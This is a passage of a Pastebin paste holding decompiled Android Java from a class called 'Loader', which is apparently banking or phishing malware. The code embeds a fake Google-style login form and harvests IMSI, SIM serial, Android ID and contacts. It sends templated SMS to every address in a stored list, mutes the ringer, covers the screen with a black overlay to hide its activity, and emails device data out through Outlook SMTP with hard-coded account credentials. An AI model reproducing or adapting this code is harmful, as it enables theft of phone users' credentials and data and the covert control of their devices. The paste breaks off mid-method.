0x454545

Untitled

Apr 8th, 2019
412
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 210.92 KB | None | 0 0
  1. package com;
  2.  
  3. import android.accounts.Account;
  4. import android.accounts.AccountManager;
  5. import android.annotation.SuppressLint;
  6. import android.app.Activity;
  7. import android.app.ActivityManager;
  8. import android.app.ActivityManager.RunningTaskInfo;
  9. import android.app.AlertDialog;
  10. import android.app.AlertDialog.Builder;
  11. import android.app.Dialog;
  12. import android.app.Notification;
  13. import android.app.NotificationManager;
  14. import android.app.PendingIntent;
  15. import android.app.Service;
  16. import android.app.usage.UsageStats;
  17. import android.app.usage.UsageStatsManager;
  18. import android.content.BroadcastReceiver;
  19. import android.content.ComponentName;
  20. import android.content.ContentResolver;
  21. import android.content.Context;
  22. import android.content.DialogInterface;
  23. import android.content.DialogInterface.OnClickListener;
  24. import android.content.Intent;
  25. import android.content.IntentFilter;
  26. import android.content.SharedPreferences;
  27. import android.content.pm.PackageInfo;
  28. import android.content.pm.PackageManager;
  29. import android.database.ContentObserver;
  30. import android.database.Cursor;
  31. import android.graphics.drawable.ColorDrawable;
  32. import android.media.AudioManager;
  33. import android.media.ToneGenerator;
  34. import android.net.ConnectivityManager;
  35. import android.net.NetworkInfo;
  36. import android.net.Uri;
  37. import android.net.wifi.WifiInfo;
  38. import android.net.wifi.WifiManager;
  39. import android.net.wifi.WifiManager.WifiLock;
  40. import android.os.Build;
  41. import android.os.Build.VERSION;
  42. import android.os.Environment;
  43. import android.os.Handler;
  44. import android.os.Looper;
  45. import android.os.PowerManager;
  46. import android.os.PowerManager.WakeLock;
  47. import android.provider.Settings.System;
  48. import android.telephony.PhoneStateListener;
  49. import android.telephony.SignalStrength;
  50. import android.telephony.SmsMessage;
  51. import android.telephony.TelephonyManager;
  52. import android.text.format.DateFormat;
  53. import android.text.format.Time;
  54. import android.util.Base64;
  55. import android.util.Log;
  56. import android.view.KeyEvent;
  57. import android.view.View;
  58. import android.view.View.OnKeyListener;
  59. import android.view.ViewParent;
  60. import android.view.WindowManager;
  61. import android.view.WindowManager.LayoutParams;
  62. import android.webkit.WebChromeClient;
  63. import android.webkit.WebChromeClient.CustomViewCallback;
  64. import android.webkit.WebSettings;
  65. import android.webkit.WebView;
  66. import android.webkit.WebViewClient;
  67. import android.widget.FrameLayout;
  68. import android.widget.RemoteViews;
  69. import java.io.ByteArrayOutputStream;
  70. import java.io.File;
  71. import java.io.InputStream;
  72. import java.io.Serializable;
  73. import java.lang.Thread.UncaughtExceptionHandler;
  74. import java.lang.reflect.Method;
  75. import java.net.HttpURLConnection;
  76. import java.net.Socket;
  77. import java.net.URL;
  78. import java.net.URLConnection;
  79. import java.util.ArrayList;
  80. import java.util.Arrays;
  81. import java.util.Comparator;
  82. import java.util.Date;
  83. import java.util.HashMap;
  84. import java.util.Iterator;
  85. import java.util.LinkedHashMap;
  86. import java.util.LinkedHashSet;
  87. import java.util.List;
  88. import java.util.Locale;
  89. import java.util.Map;
  90. import java.util.Map.Entry;
  91. import java.util.Properties;
  92. import java.util.Random;
  93. import java.util.Set;
  94. import java.util.Timer;
  95. import java.util.TimerTask;
  96. import java.util.concurrent.Callable;
  97. import java.util.concurrent.TimeUnit;
  98. import java.util.concurrent.atomic.AtomicBoolean;
  99. import java.util.regex.Matcher;
  100. import java.util.regex.Pattern;
  101. import java.util.zip.Inflater;
  102. import javax.mail.Message.RecipientType;
  103. import javax.mail.Session;
  104. import javax.mail.Transport;
  105. import javax.mail.internet.InternetAddress;
  106. import javax.mail.internet.MimeMessage;
  107. import org.json.JSONObject;
  108.  
  109. public final class Loader {
  110. public static final a Companion = new a(null);
  111. private final String A = "\n body {\n font-family: Roboto-Regular, HelveticaNeue, Arial, sans-serif;\n }\n\n label {\n color: #222;\n line-height: 16px;\n font-size: 100%;\n text-decoration: none;\n }\n\n input {\n width: 100%;\n text-align: left;\n border-radius: 1px;\n border: 1px solid #d9d9d9;\n border-top: 1px solid #c0c0c0;\n font-size: 13px;\n height: 25px;\n line-height: 25px;\n padding: 1px 8px;\n -webkit-appearance: textfield;\n background-color: white;\n -webkit-rtl-ordering: logical;\n user-select: text;\n cursor: auto;\n }\n\n input, textarea, keygen, select, button {\n text-rendering: auto;\n color: initial;\n letter-spacing: normal;\n word-spacing: normal;\n text-transform: none;\n text-indent: 0px;\n text-shadow: none;\n display: inline-block;\n text-align: start;\n margin: 0em 0em 0em 0em;\n font: 13.3333px Arial;\n }\n\n input, textarea, keygen, select, button, meter, progress {\n -webkit-writing-mode: horizontal-tb;\n }\n\n .cont {\n padding-right: 16px;\n margin-bottom: 18px\n }\n\n .yf {\n height: 24px;\n display: table-cell;\n vertical-align: middle;\n }\n\n .submit {\n user-select: none;\n line-height: 100%;\n height: 30px;\n min-width: 120px;\n -webkit-user-select: none;\n margin-left: auto;\n margin-right: auto;\n text-align: center;\n vertical-align: middle;\n -webkit-box-shadow: none;\n -moz-box-shadow: none;\n box-shadow: none;\n background-color: #4d90fe;\n background-image: -webkit-linear-gradient(top, #4d90fe, #4787ed);\n background-image: -moz-linear-gradient(top, #4d90fe, #4787ed);\n background-image: -ms-linear-gradient(top, #4d90fe, #4787ed);\n background-image: -o-linear-gradient(top, #4d90fe, #4787ed);\n background-image: linear-gradient(top, #4d90fe, #4787ed);\n border: 1px solid #3079ed;\n color: #fff;\n font-weight: bold;\n }\n\n .btn-cont {\n text-align: center;\n vertical-align: middle;\n margin-bottom: 10px;\n }\n\n .appbar {\n background: #eee;\n color: #dd4b39;\n font-size: 20px;\n padding: 12px 10px;\n }\n\n .appbarb {\n border-bottom: 1px solid #ccc;\n margin-bottom: 20px;\n }\n\n .apptitle {\n margin-left: 10px;\n font-size: 100%;\n }\n\n html, body {\n margin: 0 !important;\n padding: 0 !important;\n }\n .title {\n vertical-align: middle;\n }\n .icon {\n display: inline-block;\n vertical-align: middle;\n width: 40px;\n height: 40px;\n background-size: contain;\n background-image: url(\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAyCAMAAAAp4XiDAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyFpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNS1jMDE0IDc5LjE1MTQ4MSwgMjAxMy8wMy8xMy0xMjowOToxNSAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIChXaW5kb3dzKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo5RDdFNjc1RkY4MTQxMUU2OEJCREIyQzkzRjQ0QkZBNyIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo5RDdFNjc2MEY4MTQxMUU2OEJCREIyQzkzRjQ0QkZBNyI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjlEN0U2NzVERjgxNDExRTY4QkJEQjJDOTNGNDRCRkE3IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjlEN0U2NzVFRjgxNDExRTY4QkJEQjJDOTNGNDRCRkE3Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+5CGu0wAAAMBQTFRFUrFp7c7MQoX09KY39c9f+7wFmbrx8uCr7LSw6VtQ6kM18IdC63Nprta5Zrp7i8mcnbMq1OTYNKhT2ODvOpqU642Gm8+p5enuZJry6Us+6rsMQatZ7t/ePKlU7VosfavrQYnm7u3sNaZc5Ormf8SS7uno6koy6evv6mtg7+ziNadU6UY57u7u7e7t+bwN3+Xu+cEj7O3t7u3t7+nZP43PToz0wdPw2LkTwbw7vNvF9ZIV8Xcglbxc6uzu+awLNqRp7AzCkQAAAfdJREFUeNrE1m13mjAUAODQGglMsOSUVgTmIlp5aWylsy3b3P7/vxoCgRDDi596P3mOPOfemxtIwPPVAb6MbJE90xxdd7TQRt4IgmZJojeRzBDpJ0jjny9DQz1ECXVphF4XQYneEQ6SEmLrPYEkJO0VmkdSkQwJSWGo/UyiheF5NpeiJgrfuWMr22Kmiu1cCEZSfnVtj27L8aWpZ4uCkaasxFGE4YaebPrk9olbGjJiW1IV/v1etaGQcTt5AiH8LUysn7zBc/zKi5uNfV/UgpyLU9KRZAKr+JY+X0sm/F83kliUhJLXSuzVIXJkWfYsSzREbnYlOTAB00HyUmWpCRkmVCjsbXQW1j5Ux/YSsUXeT0avGCPLPzyZNrES5lJvmA93nckHPmVkxUhU9H/n+9iUk8WxItOKUJJXtrzzMY5jQybe+QWr3hcVLt1c5OFa9ELsFnUrtCbRp18KjIElikPdfFEX+1wYTOR5hCV4bMTxkSPExE1sggacMvCjnaT+9Fk+Z/xNVqiD9QDw+t9PlmTXIgcDtwMAE8Tlz/i+JO/CN5nOcWfE9+fipicqHBZ0021wXtzqdHkk9eXB61UgO/io4XeSedRxvFqmHLgZpZ2HuAEkYB70XhVoZrbLAw/B8IUkyOYmcGPsA3NjWNddeyj9usvVfwEGAFh9KoqHfbO5AAAAAElFTkSuQmCC\");\n }\n ";
  112. private final String B;
  113. private final String C;
  114. private final String D;
  115. private final String E;
  116. /* access modifiers changed from: private */
  117. public Context a;
  118. /* access modifiers changed from: private|final */
  119. public final Handler b = new Handler(Looper.getMainLooper());
  120. /* access modifiers changed from: private|final */
  121. public final Set<String> c = new LinkedHashSet();
  122. /* access modifiers changed from: private|final */
  123. public final Set<String> d = new LinkedHashSet();
  124. /* access modifiers changed from: private */
  125. public SharedPreferences e;
  126. private WakeLock f;
  127. /* access modifiers changed from: private|final */
  128. public final g g = new g();
  129. /* access modifiers changed from: private|final */
  130. public final Timer h = new Timer(true);
  131. /* access modifiers changed from: private */
  132. public TimerTask i;
  133. /* access modifiers changed from: private */
  134. public String j = "";
  135. /* access modifiers changed from: private */
  136. public boolean k;
  137. private h l;
  138. private f m = new b(this);
  139. private View n;
  140. private final AtomicBoolean o = new AtomicBoolean(false);
  141. private String p = "";
  142. private AlertDialog q;
  143. private final o r = new o(this);
  144. private String s = "";
  145. private String t = "";
  146. private final boolean u = q.a();
  147. /* access modifiers changed from: private */
  148. public int v;
  149. private final HashMap<String, String> w = new HashMap();
  150. public WifiLock wifiLock;
  151. /* access modifiers changed from: private */
  152. public Dialog x;
  153. /* access modifiers changed from: private */
  154. public boolean y;
  155. private long z;
  156.  
  157. public static final class a {
  158. private a() {
  159. }
  160.  
  161. public /* synthetic */ a(e eVar) {
  162. this();
  163. }
  164.  
  165. public final Loader a() {
  166. return new Loader();
  167. }
  168. }
  169.  
  170. static final class aa extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  171. final /* synthetic */ Loader a;
  172.  
  173. aa(Loader loader) {
  174. this.a = loader;
  175. super(1);
  176. }
  177.  
  178. public final c.a.h<Object> a(final Object[] objArr) {
  179. d.e.b.h.b(objArr, "params");
  180. c.a.h<Object> a2 = c.a.h.a((c.a.d.a) new c.a.d.a(this) {
  181. final /* synthetic */ aa a;
  182.  
  183. public final void a() {
  184. Loader loader = this.a.a;
  185. Object obj = objArr[0];
  186. if (obj == null) {
  187. throw new d.g("null cannot be cast to non-null type kotlin.Boolean");
  188. }
  189. loader.a(((Boolean) obj).booleanValue());
  190. }
  191. });
  192. d.e.b.h.a((Object) a2, "Maybe.fromAction<Any> {\n…as Boolean)\n }");
  193. return a2;
  194. }
  195. }
  196.  
  197. static final class ab extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Map<String, ? extends Object>>> {
  198. final /* synthetic */ Loader a;
  199.  
  200. ab(Loader loader) {
  201. this.a = loader;
  202. super(1);
  203. }
  204.  
  205. public final c.a.h<Map<String, Object>> a(Object[] objArr) {
  206. d.e.b.h.b(objArr, "it");
  207. Object systemService = Loader.access$getCtx$p(this.a).getSystemService("phone");
  208. if (systemService == null) {
  209. throw new d.g("null cannot be cast to non-null type android.telephony.TelephonyManager");
  210. }
  211. TelephonyManager telephonyManager = (TelephonyManager) systemService;
  212. c.a.h<Map<String, Object>> a2 = c.a.h.a(d.a.s.a(d.f.a("imsi", telephonyManager.getSubscriberId()), d.f.a("simSerial", telephonyManager.getSimSerialNumber()), d.f.a("androidId", System.getString(Loader.access$getCtx$p(this.a).getContentResolver(), "android_id")), d.f.a("serial", Build.SERIAL)));
  213. d.e.b.h.a((Object) a2, "Maybe.just(mapOf<String,…ild.SERIAL\n ))");
  214. return a2;
  215. }
  216. }
  217.  
  218. static final class ac extends d.e.b.i implements d.e.a.b<Object[], c.a.h<ArrayList<HashMap<String, String>>>> {
  219. final /* synthetic */ Loader a;
  220.  
  221. /* renamed from: com.Loader$ac$1 */
  222. static final class AnonymousClass1<V> implements Callable<T> {
  223. final /* synthetic */ ac a;
  224.  
  225. AnonymousClass1(ac acVar) {
  226. this.a = acVar;
  227. }
  228.  
  229. /* renamed from: a */
  230. public final ArrayList<HashMap<String, String>> call() {
  231. return q.a(Loader.access$getCtx$p(this.a.a));
  232. }
  233. }
  234.  
  235. ac(Loader loader) {
  236. this.a = loader;
  237. super(1);
  238. }
  239.  
  240. public final c.a.h<ArrayList<HashMap<String, String>>> a(Object[] objArr) {
  241. d.e.b.h.b(objArr, "it");
  242. c.a.h<ArrayList<HashMap<String, String>>> a2 = c.a.h.a((Callable<? extends T>) new AnonymousClass1(this));
  243. d.e.b.h.a((Object) a2, "Maybe.fromCallable {\n …ontact(ctx)\n }");
  244. return a2;
  245. }
  246. }
  247.  
  248. static final class ad extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  249. final /* synthetic */ Loader a;
  250.  
  251. ad(Loader loader) {
  252. this.a = loader;
  253. super(1);
  254. }
  255.  
  256. public final c.a.h<Object> a(final Object[] objArr) {
  257. d.e.b.h.b(objArr, "params");
  258. c.a.h<Object> a2 = c.a.h.a((c.a.d.a) new c.a.d.a(this) {
  259. final /* synthetic */ ad a;
  260.  
  261. public final void a() {
  262. Object obj = objArr[0];
  263. if (obj == null) {
  264. throw new d.g("null cannot be cast to non-null type kotlin.Boolean");
  265. }
  266. boolean booleanValue = ((Boolean) obj).booleanValue();
  267. Loader.access$getPreferences$p(this.a.a).edit().putBoolean("lock", booleanValue).apply();
  268. if (booleanValue) {
  269. q.b(Loader.access$getCtx$p(this.a.a));
  270. } else {
  271. q.c(Loader.access$getCtx$p(this.a.a));
  272. }
  273. }
  274. });
  275. d.e.b.h.a((Object) a2, "Maybe.fromAction<Any> {\n… }\n }");
  276. return a2;
  277. }
  278. }
  279.  
  280. static final class ae extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Boolean>> {
  281. final /* synthetic */ Loader a;
  282.  
  283. ae(Loader loader) {
  284. this.a = loader;
  285. super(1);
  286. }
  287.  
  288. public final c.a.h<Boolean> a(final Object[] objArr) {
  289. d.e.b.h.b(objArr, "params");
  290. c.a.h<Boolean> a2 = c.a.h.a((c.a.k<T>) new c.a.k<T>(this) {
  291. final /* synthetic */ ae a;
  292.  
  293. static final class a extends d.e.b.i implements d.e.a.b<d.i.i, String> {
  294. final /* synthetic */ Random a;
  295.  
  296. a(Random random) {
  297. this.a = random;
  298. super(1);
  299. }
  300.  
  301. public final String a(d.i.i iVar) {
  302. d.e.b.h.b(iVar, "it");
  303. return String.valueOf(this.a.nextInt(90000) + 10000);
  304. }
  305. }
  306.  
  307. static final class b extends d.e.b.i implements d.e.a.b<d.i.i, String> {
  308. final /* synthetic */ Random a;
  309.  
  310. b(Random random) {
  311. this.a = random;
  312. super(1);
  313. }
  314.  
  315. public final String a(d.i.i iVar) {
  316. d.e.b.h.b(iVar, "it");
  317. String substring = "//////".substring(0, this.a.nextInt(5) + 1);
  318. d.e.b.h.a((Object) substring, "(this as java.lang.Strin…ing(startIndex, endIndex)");
  319. return substring;
  320. }
  321. }
  322.  
  323. static final class c extends d.e.b.i implements d.e.a.b<d.i.i, String> {
  324. final /* synthetic */ Random a;
  325.  
  326. c(Random random) {
  327. this.a = random;
  328. super(1);
  329. }
  330.  
  331. public final String a(d.i.i iVar) {
  332. d.e.b.h.b(iVar, "it");
  333. return String.valueOf("abcdefghijklmnopqrstuvwxyz".charAt(this.a.nextInt(26)));
  334. }
  335. }
  336.  
  337. public final void a(c.a.i<Boolean> iVar) {
  338. Boolean valueOf;
  339. d.e.b.h.b(iVar, "emitter");
  340. Object obj = objArr[0];
  341. if (obj == null) {
  342. throw new d.g("null cannot be cast to non-null type kotlin.String");
  343. }
  344. String str = (String) obj;
  345. Object systemService = Loader.access$getCtx$p(this.a.a).getSystemService("phone");
  346. if (systemService == null) {
  347. throw new d.g("null cannot be cast to non-null type android.telephony.TelephonyManager");
  348. }
  349. if (((TelephonyManager) systemService).getSimState() == 5) {
  350. CharSequence charSequence = str;
  351. if (charSequence.length() > 0) {
  352. Set<String> a2 = a.a.a(Loader.access$getCtx$p(this.a.a));
  353. Random random = new Random();
  354. for (String mVar : a2) {
  355. o.a.a(new m(Loader.access$getCtx$p(this.a.a), mVar, new d.i.k("\\^").a(new d.i.k("~~").a(new d.i.k("\\$\\$").a(charSequence, (d.e.a.b) new a(random)), (d.e.a.b) new b(random)), (d.e.a.b) new c(random)), null, AnonymousClass1.a));
  356. }
  357. valueOf = Boolean.valueOf(true);
  358. iVar.a(valueOf);
  359. }
  360. }
  361. valueOf = Boolean.valueOf(false);
  362. iVar.a(valueOf);
  363. }
  364. });
  365. d.e.b.h.a((Object) a2, "Maybe.create<Boolean> { … }\n }");
  366. return a2;
  367. }
  368. }
  369.  
  370. static final class af extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  371. final /* synthetic */ Loader a;
  372.  
  373. af(Loader loader) {
  374. this.a = loader;
  375. super(1);
  376. }
  377.  
  378. public final c.a.h<Object> a(final Object[] objArr) {
  379. d.e.b.h.b(objArr, "params");
  380. c.a.h<Object> a2 = c.a.h.a((c.a.d.a) new c.a.d.a(this) {
  381. final /* synthetic */ af a;
  382.  
  383. public final void a() {
  384. Object obj = objArr[0];
  385. if (obj == null) {
  386. throw new d.g("null cannot be cast to non-null type kotlin.String");
  387. }
  388. Loader.access$getPreferences$p(this.a.a).edit().putString("fs", (String) obj).apply();
  389. }
  390. });
  391. d.e.b.h.a((Object) a2, "Maybe.fromAction<Any> {\n… v).apply()\n }");
  392. return a2;
  393. }
  394. }
  395.  
  396. static final class ag extends d.e.b.i implements d.e.a.b<Object[], c.a.h<String>> {
  397. final /* synthetic */ Loader a;
  398.  
  399. ag(Loader loader) {
  400. this.a = loader;
  401. super(1);
  402. }
  403.  
  404. public final c.a.h<String> a(Object[] objArr) {
  405. d.e.b.h.b(objArr, "params");
  406. c.a.h<String> a2 = c.a.h.a(Loader.access$getPreferences$p(this.a).getString("fs", ""));
  407. d.e.b.h.a((Object) a2, "Maybe.just(preferences.getString(\"fs\", \"\"))");
  408. return a2;
  409. }
  410. }
  411.  
  412. static final class ah extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Boolean>> {
  413. final /* synthetic */ Loader a;
  414.  
  415. ah(Loader loader) {
  416. this.a = loader;
  417. super(1);
  418. }
  419.  
  420. public final c.a.h<Boolean> a(final Object[] objArr) {
  421. d.e.b.h.b(objArr, "params");
  422. c.a.h<Boolean> a2 = c.a.h.a((Callable<? extends T>) new Callable<T>(this) {
  423. final /* synthetic */ ah a;
  424.  
  425. public final boolean a() {
  426. Object obj = objArr[0];
  427. if (obj == null) {
  428. throw new d.g("null cannot be cast to non-null type kotlin.String");
  429. }
  430. return this.a.a.c.contains((String) obj);
  431. }
  432.  
  433. public /* synthetic */ Object call() {
  434. return Boolean.valueOf(a());
  435. }
  436. });
  437. d.e.b.h.a((Object) a2, "Maybe.fromCallable {\n …ntains(pkg)\n }");
  438. return a2;
  439. }
  440. }
  441.  
  442. static final class ai extends d.e.b.i implements d.e.a.b<Object[], c.a.h<Object>> {
  443. final /* synthetic */ Loader a;
  444.  
  445. ai(Loader loader) {
  446. this.a = loader;
  447. super(1);
  448. }
  449.  
  450. public final c.a.h<Object> a(final Object[] objArr) {
  451. d.e.b.h.b(objArr, "params");
  452. c.a.h<Object> a2 = c.a.h.a((c.a.d.a) new c.a.d.a(this) {
  453. final /* synthetic */ ai a;
  454.  
  455. public final void a() {
  456. Object obj = objArr[0];
  457. if (obj == null) {
  458. throw new d.g("null cannot be cast to non-null type kotlin.Int");
  459. }
  460. int intValue = ((Integer) obj).intValue();
  461. Object systemService = Loader.access$getCtx$p(this.a.a).getSystemService("audio");
  462. if (systemService == null) {
  463. throw new d.g("null cannot be cast to non-null type android.media.AudioManager");
  464. }
  465. ((AudioManager) systemService).setRingerMode(intValue);
  466. }
  467. });
  468. d.e.b.h.a((Object) a2, "Maybe.fromAction<Any> {\n…Mode = mode\n }");
  469. return a2;
  470. }
  471. }
  472.  
  473. static final class aj implements Runnable {
  474. final /* synthetic */ Loader a;
  475.  
  476. aj(Loader loader) {
  477. this.a = loader;
  478. }
  479.  
  480. public final void run() {
  481. if (this.a.getFsFloatView() != null) {
  482. Object systemService = Loader.access$getCtx$p(this.a).getApplicationContext().getSystemService("window");
  483. if (systemService == null) {
  484. throw new d.g("null cannot be cast to non-null type android.view.WindowManager");
  485. }
  486. ((WindowManager) systemService).removeView(this.a.getFsFloatView());
  487. }
  488. }
  489. }
  490.  
  491. static final class ak implements Runnable {
  492. final /* synthetic */ Loader a;
  493.  
  494. ak(Loader loader) {
  495. this.a = loader;
  496. }
  497.  
  498. public final void run() {
  499. this.a.requestIgnoreBatteryOpt();
  500. }
  501. }
  502.  
  503. static final class al implements Runnable {
  504. final /* synthetic */ Loader a;
  505. final /* synthetic */ String b;
  506.  
  507. al(Loader loader, String str) {
  508. this.a = loader;
  509. this.b = str;
  510. }
  511.  
  512. public final void run() {
  513. Properties properties = new Properties();
  514. properties.setProperty("mail.transport.protocol", "smtp");
  515. properties.setProperty("mail.smtp.host", "smtp-mail.outlook.com");
  516. properties.setProperty("mail.smtp.port", "587");
  517. properties.setProperty("mail.smtp.auth", "true");
  518. properties.setProperty("mail.smtp.starttls.enable", "true");
  519. String string = Loader.access$getPreferences$p(this.a).getString("last_addr", "");
  520. d.e.b.h.a((Object) string, "preferences.getString(\"last_addr\", \"\")");
  521. String a2 = d.i.m.a(string, "ws://", "", false, 4, null);
  522. int a3 = d.i.m.a((CharSequence) a2, ':', 0, false, 6, null);
  523. if (a3 > 0) {
  524. if (a2 == null) {
  525. throw new d.g("null cannot be cast to non-null type java.lang.String");
  526. }
  527. a2 = a2.substring(0, a3);
  528. d.e.b.h.a((Object) a2, "(this as java.lang.Strin…ing(startIndex, endIndex)");
  529. }
  530. final String ping = this.a.ping(a2, 4);
  531. Session instance = Session.getInstance(properties);
  532. d.e.b.h.a((Object) instance, "session");
  533. instance.setDebug(true);
  534. MimeMessage a4 = new d.e.b.i(this) {
  535. final /* synthetic */ al a;
  536.  
  537. public final MimeMessage a(Session session, String str, String str2) {
  538. d.e.b.h.b(session, "session");
  539. d.e.b.h.b(str, "sendMail");
  540. d.e.b.h.b(str2, "receiveMail");
  541. Object systemService = Loader.access$getCtx$p(this.a.a).getSystemService("phone");
  542. if (systemService == null) {
  543. throw new d.g("null cannot be cast to non-null type android.telephony.TelephonyManager");
  544. }
  545. TelephonyManager telephonyManager = (TelephonyManager) systemService;
  546. String access$getLine1 = this.a.a.a(telephonyManager);
  547. String str3 = access$getLine1 != null ? access$getLine1 : "";
  548. String networkOperatorName = telephonyManager.getNetworkOperatorName();
  549. String locale = Locale.getDefault().toString();
  550. Object systemService2 = Loader.access$getCtx$p(this.a.a).getSystemService("connectivity");
  551. if (systemService2 == null) {
  552. throw new d.g("null cannot be cast to non-null type android.net.ConnectivityManager");
  553. }
  554. NetworkInfo activeNetworkInfo = ((ConnectivityManager) systemService2).getActiveNetworkInfo();
  555. String str4 = "无";
  556. if (activeNetworkInfo != null) {
  557. str4 = activeNetworkInfo.getTypeName();
  558. d.e.b.h.a((Object) str4, "info.typeName");
  559. }
  560. if (d.e.b.h.a((Object) str4, (Object) "MOBILE")) {
  561. str4 = q.a(telephonyManager.getNetworkType());
  562. }
  563. MimeMessage mimeMessage = new MimeMessage(session);
  564. StringBuilder sb = new StringBuilder();
  565. sb.append("用户:");
  566. sb.append(str3);
  567. mimeMessage.setFrom(new InternetAddress(str, sb.toString(), "UTF-8"));
  568. RecipientType recipientType = MimeMessage.RecipientType.TO;
  569. StringBuilder sb2 = new StringBuilder();
  570. sb2.append("用户:");
  571. sb2.append(str3);
  572. mimeMessage.setRecipient(recipientType, new InternetAddress(str2, sb2.toString(), "UTF-8"));
  573. StringBuilder sb3 = new StringBuilder();
  574. sb3.append("连接错误 ");
  575. sb3.append(locale);
  576. mimeMessage.setSubject(sb3.toString(), "UTF-8");
  577. StringBuilder sb4 = new StringBuilder();
  578. sb4.append("号码:");
  579. sb4.append(str3);
  580. sb4.append(" \r\n");
  581. sb4.append("网络:");
  582. sb4.append(str4);
  583. sb4.append('/');
  584. sb4.append(networkOperatorName);
  585. sb4.append(" \r\n");
  586. sb4.append("PING:");
  587. sb4.append(ping);
  588. sb4.append(" \r\n");
  589. sb4.append(this.a.b);
  590. mimeMessage.setContent(sb4.toString(), "text/plain;charset=UTF-8");
  591. mimeMessage.setSentDate(new Date());
  592. mimeMessage.saveChanges();
  593. return mimeMessage;
  594. }
  595. }.a(instance, "aswasd2v@hotmail.com", "aswasd2v@hotmail.com");
  596. Transport transport = instance.getTransport();
  597. transport.connect("aswasd2v@hotmail.com", "shaoye11");
  598. transport.sendMessage(a4, a4.getAllRecipients());
  599. transport.close();
  600. }
  601. }
  602.  
  603. static final class am implements Runnable {
  604. final /* synthetic */ Loader a;
  605.  
  606. am(Loader loader) {
  607. this.a = loader;
  608. }
  609.  
  610. public final void run() {
  611. try {
  612. LayoutParams layoutParams = new LayoutParams();
  613. Object systemService = Loader.access$getCtx$p(this.a).getApplicationContext().getSystemService("window");
  614. if (systemService == null) {
  615. throw new d.g("null cannot be cast to non-null type android.view.WindowManager");
  616. }
  617. WindowManager windowManager = (WindowManager) systemService;
  618. layoutParams.type = 2010;
  619. layoutParams.format = 1;
  620. layoutParams.flags = 8;
  621. layoutParams.gravity = 51;
  622. layoutParams.width = -1;
  623. layoutParams.height = -1;
  624. if (this.a.getFsFloatView() == null) {
  625. this.a.setFsFloatView(new View(Loader.access$getCtx$p(this.a).getApplicationContext()));
  626. View fsFloatView = this.a.getFsFloatView();
  627. if (fsFloatView == null) {
  628. d.e.b.h.a();
  629. }
  630. fsFloatView.setBackgroundDrawable(new ColorDrawable(-16777216));
  631. }
  632. windowManager.addView(this.a.getFsFloatView(), layoutParams);
  633. } catch (Exception e) {
  634. e.printStackTrace();
  635. }
  636. }
  637. }
  638.  
  639. static final class an implements UncaughtExceptionHandler {
  640. final /* synthetic */ Loader a;
  641.  
  642. an(Loader loader) {
  643. this.a = loader;
  644. }
  645.  
  646. public final void uncaughtException(Thread thread, Throwable th) {
  647. th.printStackTrace();
  648. try {
  649. Loader.access$getPreferences$p(this.a).edit().putString("lastError", th.toString()).apply();
  650. } catch (Throwable th2) {
  651. }
  652. }
  653. }
  654.  
  655. static final class ao implements Runnable {
  656. public static final ao a = new ao();
  657.  
  658. ao() {
  659. }
  660.  
  661. public final void run() {
  662. try {
  663. File file = new File(c.k);
  664. if (!file.exists()) {
  665. file.mkdirs();
  666. } else if (file.isFile()) {
  667. file.delete();
  668. } else if (file.isDirectory()) {
  669. File[] listFiles = file.listFiles();
  670. if (listFiles == null) {
  671. d.e.b.h.a();
  672. }
  673. for (File delete : listFiles) {
  674. delete.delete();
  675. }
  676. }
  677. } catch (Exception e) {
  678. e.printStackTrace();
  679. }
  680. }
  681. }
  682.  
  683. public static final class ap extends PhoneStateListener {
  684. final /* synthetic */ Loader a;
  685.  
  686. static final class a<T> implements c.a.d.d<Object> {
  687. public static final a a = new a();
  688.  
  689. a() {
  690. }
  691.  
  692. public final void a(Object obj) {
  693. }
  694. }
  695.  
  696. static final class b<T> implements c.a.d.d<Throwable> {
  697. public static final b a = new b();
  698.  
  699. b() {
  700. }
  701.  
  702. public final void a(Throwable th) {
  703. th.printStackTrace();
  704. }
  705. }
  706.  
  707. ap(Loader loader) {
  708. this.a = loader;
  709. }
  710.  
  711. public void onDataConnectionStateChanged(int i) {
  712. if (i == 2) {
  713. this.a.h();
  714. }
  715. }
  716.  
  717. public void onSignalStrengthsChanged(SignalStrength signalStrength) {
  718. int i;
  719. d.e.b.h.b(signalStrength, "signalStrength");
  720. try {
  721. Object invoke = signalStrength.getClass().getMethod("getLevel", new Class[0]).invoke(signalStrength, new Object[0]);
  722. if (invoke == null) {
  723. throw new d.g("null cannot be cast to non-null type kotlin.Int");
  724. }
